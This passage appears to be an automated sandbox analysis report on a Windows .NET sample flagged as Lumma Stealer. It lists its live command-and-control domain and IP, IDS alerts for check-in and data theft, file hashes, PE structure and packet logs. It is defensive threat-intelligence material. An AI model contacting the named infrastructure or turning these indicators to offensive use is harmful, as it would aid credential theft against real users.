http://upx.sf.net	Amcache.hve.5.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.97.3	circujitstorm.bet	European Union		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1629892
Start date and time:	2025-03-05 09:11:34 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	MCxU5Fj.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/5@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 93% Number of executed functions: 37 Number of non-executed functions: 71
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.208.16.94, 40.126.31.67, 172.202.163.200
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:12:32	API Interceptor	8x Sleep call for process: MCxU5Fj.exe modified
03:12:37	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	r_BBVA_MensajeSWIFT04-03-2025-PDF.exe	Get hash	malicious	FormBook	Browse	www.timeinsardinia.info/50g8/
	https://u.to/8eAUIg	Get hash	malicious	HTMLPhisher	Browse	staemconmmuntiy.com/gift/id=746904
	rRFQ24A.exe	Get hash	malicious	FormBook	Browse	www.sld6.rest/q0rl/
	VibeCall.exe	Get hash	malicious	RHADAMANTHYS	Browse	rustaisolutionnorisk.com/downloads/videosolution_vibecall_b.exe
	VibeCall.exe	Get hash	malicious	RHADAMANTHYS	Browse	rustaisolutionnorisk.com/downloads/videosolution_vibecall_b.exe
	VibeCall.exe	Get hash	malicious	RHADAMANTHYS	Browse	rustaisolutionnorisk.com/downloads/videosolution_vibecall_b.exe
	VibeCall.exe	Get hash	malicious	RHADAMANTHYS	Browse	rustaisolutionnorisk.com/downloads/videosolution_vibecall_b.exe
	WMnMQH4voD.exe	Get hash	malicious	GhostRat	Browse	td49t43g.com/1/t4.bmp
	http://aptbusinessservices.com.au/	Get hash	malicious	Unknown	Browse	aptbusinessservices.com.au/
	http://uploads-ssl.webflow.com/660018002a32edee7a11d41b/66335b965a5a96f03bd82400_kasuwidavogog.pdf	Get hash	malicious	Unknown	Browse	melurilexuki.urseghy.com/favicon.ico

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
circujitstorm.bet	d5Wai5fIAK.exe	Get hash	malicious	Amadey, GCleaner, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	188.114.97.3
	S2W2ftXM2b.exe	Get hash	malicious	Amadey, LummaC Stealer, PureLog Stealer, XWorm	Browse	188.114.97.3
	pGOrhjLXy3.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc	Browse	188.114.96.3
	random.exe	Get hash	malicious	Amadey, Credential Flusher, GCleaner, LummaC Stealer, Stealc	Browse	188.114.97.3
	random.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://variotok.com	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	virut' in file 'Setup.exe', during attempted open by 'explorer.exe'	Get hash	malicious	Unknown	Browse	104.18.26.149
	GMOgZgNpNu.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	172.67.179.246
	xIwQcY1fc4.exe	Get hash	malicious	Amadey, GCleaner, LummaC Stealer, PureLog Stealer	Browse	104.21.31.208
	Payment copy-8899.exe	Get hash	malicious	FormBook	Browse	172.67.148.163
	https://040030025.blob.core.windows.net/factura/index.html	Get hash	malicious	Phisher	Browse	1.1.1.1
	MARCH SHIPMENT PLAN DOCS.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	DHL AWB Receipt_pdf.bat.exe	Get hash	malicious	FormBook	Browse	104.21.96.1
	SWIFT COPY.xls	Get hash	malicious	Unknown	Browse	104.26.1.139
	DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.80.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	GMOgZgNpNu.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	188.114.97.3
	xIwQcY1fc4.exe	Get hash	malicious	Amadey, GCleaner, LummaC Stealer, PureLog Stealer	Browse	188.114.97.3
	transferencia HSBC.xla.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.3
	Order Confirmation.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	transferencia HSBC.xla.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.3
	d5Wai5fIAK.exe	Get hash	malicious	Amadey, GCleaner, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	188.114.97.3
	VER_3316ARUGVHQMejzy7451UUFA.vbs	Get hash	malicious	Unknown	Browse	188.114.97.3
	S6uUdOHRxv.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	QyA6MaTya1.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	R3tmayKLpF.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_MCxU5Fj.exe_588fd21371929c281e65f3b6d351d45e72b15f_10a1e513_d045ade9-6a85-4ec5-99dd-0b587b0d093d\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8894545813877935
Encrypted:	false
SSDEEP:	96:4cuxUF/iGZyCSsPgijTOAqyS3QXIDcQlc6VcEdcw3V+BHUHZ0ownOgHkEwH3dEFE:tMGZJSBA0LR3EaGGzuiFFZ24IO8z
MD5:	EC685267DF496146DE9289DA31A1D50F
SHA1:	47123BA3FF727F1D12607756280266E8A86D0EDB
SHA-256:	AF86C2599477F9DD84F39184B034771DCB483C06F5275F667B39FA1C3C428F03
SHA-512:	08CB54321D0958712958B06B2FDDCF6411BCA88F5A10D29000FC8E17CCBA8F46A53E24B0014975889B93ABD10D483F90DFBF949EFFDCF3370FD90641EEBC237D
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.5.6.3.5.9.5.1.7.9.5.6.8.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.5.6.3.5.9.5.2.3.2.6.9.3.5.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.0.4.5.a.d.e.9.-.6.a.8.5.-.4.e.c.5.-.9.9.d.d.-.0.b.5.8.7.b.0.d.0.9.3.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.1.2.4.d.e.c.2.-.c.6.0.e.-.4.8.d.a.-.9.b.0.6.-.0.6.6.0.3.c.f.7.4.1.e.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.C.x.U.5.F.j...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.l.i.t.i.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.2.8.-.0.0.0.1.-.0.0.1.4.-.8.5.1.7.-.9.d.5.7.a.6.8.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.e.d.2.2.a.c.4.e.5.d.4.5.6.1.a.7.5.a.6.a.e.1.6.5.c.5.8.4.3.1.c.0.0.0.0.0.0.0.0.!.0.0.0.0.8.1.0.4.f.a.0.8.c.f.c.c.9.0.6.6.d.f.3.d.1.6.b.f.a.1.e.b.e.1.1.9.6.6.8.c.9.0.9.7.!.M.C.x.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC21C.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Mar 5 08:12:32 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	157446
Entropy (8bit):	3.7328087827469325
Encrypted:	false
SSDEEP:	1536:pOuBojRopN4uE2aOxPCbfFlLTgPsOJA5+o8tTqCDYJFC:p2+4uEqNC7FlLTg0OsGdYH
MD5:	73259FCAA2309DC66F981E3798FA847E
SHA1:	EAF9C6A82F48C59C4984A4C4F595A7B233486265
SHA-256:	71E25F33807A370EE2208344D40592EBFCD5F9F25DFD881789252140F71C18A3
SHA-512:	AF22443CF8D4134B32EF6596F782C390C9F48354DE56D0D2A5BF2476E8AC3C3139000179E794C898C7CF2844C0BE6B05E174C3A95BEDF2696D4C2ECC22915CC5
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......p..g....................................$................/..........`.......8...........T...........($...B......................................................................................................eJ......P.......GenuineIntel............T.......(...o..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC317.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8372
Entropy (8bit):	3.692768508003347
Encrypted:	false
SSDEEP:	192:R6l7wVeJqP6Nr6YSFSU90gmf8VJNprt89b7jsfgpm:R6lXJq6h6YASU90gmf8VJ67Ifj
MD5:	2EFB580F19BB3F7DC0AB920DD8F5C774
SHA1:	7531092E396117768FDC39EAC1929F41BF340FD9
SHA-256:	A273B03F796D9742AAAEF7AEE2088F2CC6314D7D75F5C8C41BDF65EB1806083F
SHA-512:	62612548C0527B783F7B0AEAEC1BAD29EA09A6601034F75B680C40C3DD661D9611246DF3BF40A48D600997FFBFC8EA4B23C8C76D9779EA09A0C2D9D21BC6AA31
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.6.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC347.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4735
Entropy (8bit):	4.460096891649389
Encrypted:	false
SSDEEP:	48:cvIwWl8zstJg77aI9dKWpW8VY7Ym8M4JiwkdxPcf6FTs+q8vTwkdxPcf5OSbIgQA:uIjfHI7Pr7V3Ji+fSsKT+f5OSbIgQCd
MD5:	D1A5D02423DDE1A505951DE596E12B55
SHA1:	4723514778449CA874DFC5D65208843EDE3F817B
SHA-256:	9F0818754413BD385C10F59A0AD7D5AC6AAAF0FCA3B73E2243F4C3EA16CDB0DB
SHA-512:	1C85989610B817E20419393F58713E1BA870E17EAC23D332DEA2129607E007C24B033139B07B2617904B8A4F582D093F2F0C63D96686BFDB8896171D06111DDE
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="747315" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.372305226346921
Encrypted:	false
SSDEEP:	6144:hFVfpi6ceLP/9skLmb0cyWWSPtaJG8nAge35OlMMhA2AX4WABlguNCiLR:HV1iyWWI/glMM6kF7gqR
MD5:	0DBAF3D12E3A7571056473B4B3058A20
SHA1:	1C11CC9620C3B066302D7FA69D349519C6E54A18
SHA-256:	8B79D6FB331BFA8F6808B7142E9C6FE2E27B1B5D0B77EE7551A6695B37939CC0
SHA-512:	FA105B88098741D0E51FD43674AE4BB5F3312D53E46ADDED56A8780AA928A39AD6ED2CECC8E465DC26CEAF883312497CEE9AD187189C7E3A708677E858A219D9
Malicious:	false
Reputation:	low
Preview:	regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...W.................................................................................................................................................................................................................................................................................................................................................z.c........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.911490903717646
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	MCxU5Fj.exe
File size:	425'472 bytes
MD5:	641525fe17d5e9d483988eff400ad129
SHA1:	8104fa08cfcc9066df3d16bfa1ebe119668c9097
SHA256:	7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a
SHA512:	ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e
SSDEEP:	6144:b/JuB2yKgy6uKbxH9TDbF+ov5H4LX5nviFKXJD+MZaq8FS48UP01PduTIGsVThM9:b/8Z0hKtHBnv5YLIM6MXhrd3M9
TLSH:	7794124A73C0AA72C6A458B6C1E34D2243F996476537F34E3E850CD90F923B49B367CA
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x40e50e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xAFA985D8 [Wed May 23 05:10:48 2063 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xe4c0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x10000	0x598	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x12000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xe478	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xc514	0xc600	c8e98fba2c864102aff8d83a8ccc0220	False	0.5807686237373737	data	6.1883466777474085	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x10000	0x598	0x600	45944832ca66f37df2a22d1e745bbda0	False	0.4114583333333333	data	4.028483779114603	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x12000	0xc	0x200	f9bf38b490c2b4dad223aadf230001d0	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.CSS	0x14000	0x5ac00	0x5ac00	e4590a7813ec69ec4bfc625c57a0a07a	False	1.0003255208333333	data	7.999474364736815	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x100a0	0x30c	data			0.4230769230769231
RT_MANIFEST	0x103ac	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
Comments
CompanyName
FileDescription	Politic
FileVersion	1.0.0.0
InternalName	Politic.exe
LegalCopyright	Copyright 2025
LegalTrademarks
OriginalFilename	Politic.exe
ProductName	Politic
ProductVersion	1.0.0.0
Assembly Version	1.0.0.0

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-05T09:12:32.577720+0100	2060528	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (circujitstorm .bet)	1	192.168.2.8	63047	1.1.1.1	53	UDP
2025-03-05T09:12:33.117619+0100	2060529	ET MALWARE Observed Win32/Lumma Stealer Related Domain (circujitstorm .bet in TLS SNI)	1	192.168.2.8	49705	188.114.97.3	443	TCP
2025-03-05T09:12:33.117619+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49705	188.114.97.3	443	TCP
2025-03-05T09:12:33.297481+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.8	49705	188.114.97.3	443	TCP
2025-03-05T09:12:33.297481+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49705	188.114.97.3	443	TCP
2025-03-05T09:12:33.782535+0100	2060529	ET MALWARE Observed Win32/Lumma Stealer Related Domain (circujitstorm .bet in TLS SNI)	1	192.168.2.8	49706	188.114.97.3	443	TCP
2025-03-05T09:12:33.782535+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49706	188.114.97.3	443	TCP
2025-03-05T09:12:35.354812+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49706	188.114.97.3	443	TCP
2025-03-05T09:12:36.019518+0100	2060529	ET MALWARE Observed Win32/Lumma Stealer Related Domain (circujitstorm .bet in TLS SNI)	1	192.168.2.8	49709	188.114.97.3	443	TCP
2025-03-05T09:12:36.019518+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49709	188.114.97.3	443	TCP
2025-03-05T09:12:41.242856+0100	2060529	ET MALWARE Observed Win32/Lumma Stealer Related Domain (circujitstorm .bet in TLS SNI)	1	192.168.2.8	49713	188.114.97.3	443	TCP
2025-03-05T09:12:41.242856+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49713	188.114.97.3	443	TCP
2025-03-05T09:12:42.333860+0100	2060529	ET MALWARE Observed Win32/Lumma Stealer Related Domain (circujitstorm .bet in TLS SNI)	1	192.168.2.8	49714	188.114.97.3	443	TCP
2025-03-05T09:12:42.333860+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49714	188.114.97.3	443	TCP
2025-03-05T09:12:43.609797+0100	2060529	ET MALWARE Observed Win32/Lumma Stealer Related Domain (circujitstorm .bet in TLS SNI)	1	192.168.2.8	49715	188.114.97.3	443	TCP
2025-03-05T09:12:43.609797+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49715	188.114.97.3	443	TCP
2025-03-05T09:12:44.033527+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.8	49715	188.114.97.3	443	TCP
2025-03-05T09:12:44.926572+0100	2060529	ET MALWARE Observed Win32/Lumma Stealer Related Domain (circujitstorm .bet in TLS SNI)	1	192.168.2.8	49716	188.114.97.3	443	TCP
2025-03-05T09:12:44.926572+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49716	188.114.97.3	443	TCP
2025-03-05T09:12:56.434737+0100	2060529	ET MALWARE Observed Win32/Lumma Stealer Related Domain (circujitstorm .bet in TLS SNI)	1	192.168.2.8	49720	188.114.97.3	443	TCP
2025-03-05T09:12:56.434737+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49720	188.114.97.3	443	TCP
2025-03-05T09:12:56.901565+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49720	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 5, 2025 09:12:32.608267069 CET	49705	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:32.608335972 CET	443	49705	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:32.608455896 CET	49705	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:32.612663984 CET	49705	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:32.612678051 CET	443	49705	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:33.117546082 CET	443	49705	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:33.117619038 CET	49705	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:33.120347977 CET	49705	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:33.120359898 CET	443	49705	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:33.120596886 CET	443	49705	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:33.162527084 CET	49705	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:33.189233065 CET	49705	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:33.189270973 CET	49705	443	192.168.2.8	188.114.97.3
Mar 5, 2025 09:12:33.189384937 CET	443	49705	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:33.297436953 CET	443	49705	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:33.297480106 CET	443	49705	188.114.97.3	192.168.2.8
Mar 5, 2025 09:12:33.297502041 CET	443	49705	188.114.97.3	192.168.2.8
